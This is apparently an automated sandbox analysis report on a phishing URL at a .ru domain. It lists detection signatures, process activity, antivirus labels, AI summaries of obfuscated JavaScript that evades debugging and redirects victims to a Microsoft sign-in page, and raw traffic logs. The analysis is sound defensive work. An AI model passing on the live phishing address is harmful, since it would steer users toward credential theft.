Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://6y.tickarmoz.ru/aY57/

Overview

General Information

Sample URL:https://6y.tickarmoz.ru/aY57/
Analysis ID:1591389
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
AI detected suspicious URL
Installs a global event hook (focus changed)
Installs a global keyboard hook
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Installs a global mouse hook
Sigma detected: Potentially Suspicious Rundll32 Activity
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1960,i,12798820108584300126,5385190659516403337,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://6y.tickarmoz.ru/aY57/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • rundll32.exe (PID: 1696 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 , MD5: EF3179D498793BF4234F708D3BE28633)
  • osk.exe (PID: 7412 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)
  • osk.exe (PID: 7604 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)
    • explorer.exe (PID: 4380 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, CommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3800, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, ProcessId: 1696, ProcessName: rundll32.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://6y.tickarmoz.ru/aY57/Avira URL Cloud: detection malicious, Label: phishing
Source: https://6y.tickarmoz.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://6y.tickarmoz.ru/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://6y.tickarmoz.ru/aY57/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://6y.tickarmoz.ru/aY57/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://6y.tickarmoz.ru/aY57/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, the script demonstrates malicious intent and poses a significant security risk.
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://6y.tickarmoz.ru
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 379c7025-93b3-41f3-8843-dea3aeebfaee85c0ca81-1fb5-4c7c-9cf3-3ab8a23023a2
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://6y.tickarmoz.ru/aY57/HTTP Parser: No favicon
Source: https://6y.tickarmoz.ru/aY57/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724910833179634.Mzc5YzcwMjUtOTNiMy00MWYzLTg4NDMtZGVhM2FlZWJmYWVlODVjMGNhODEtMWZiNS00YzdjLTljZjMtM2FiOGEyMzAyM2Ey&ui_locales=en-US&mkt=en-US&client-request-id=d0e07436-8d8f-4ab8-8097-d678559dae15&state=r7Ze0299GLA2jQ8I0AMZTe2uKj3GwxHhA2doOxPT8FxON2pbwRIpoPyhjZY5c7-XJM4sYAfiem0LWBCwg_6pWOhMJXNy6p5FJ21_7e68TZDVGxvYNENRlX5yrrdwxsOECQpLUIAm1Xpr-EJhqcRX0oi9w2Ah9otg1Vjjcai5rQTjMdZCLMPAGfiKFz_PDufjJ1B8A7Fd3bzIcRIfqTUZfopON7P9nyu0p7kki7la_aBGG5zdoh2TPHGL3e9Xj85hM2EuXD4nKDzj_G-KItqa1g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.17.11.191:443 -> 192.168.2.16:49840 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownTCP traffic detected without corresponding DNS query: 20.17.11.191
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /aY57/ HTTP/1.1Host: 6y.tickarmoz.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6y.tickarmoz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6y.tickarmoz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6y.tickarmoz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6y.tickarmoz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
